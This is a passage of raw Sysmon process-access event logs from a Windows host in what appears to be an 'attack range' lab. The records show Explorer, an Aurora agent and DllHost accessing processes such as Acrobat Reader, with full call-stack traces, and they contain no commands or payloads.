DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047100Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.515{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047099Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.514{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047098Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.502{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047097Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.502{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047096Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.502{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047095Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.458{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002660C:\Windows\Explorer.EXE{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\SHCORE.dll+35586|C:\Windows\System32\SHCORE.dll+201ff|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a 10341000x800000000000000047094Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.457{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002660C:\Windows\Explorer.EXE{FE4C2B44-E653-63C7-8F06-00000000AF02}6444C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\System32\combase.dll+622cb|C:\Windows\System32\SHCORE.dll+35586|C:\Windows\System32\SHCORE.dll+201ff|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+54d13|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a 10341000x800000000000000047093Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.454{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c3d3|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x800000000000000047092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.453{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.453{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.453{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.453{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.453{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.453{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.453{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.452{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.452{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 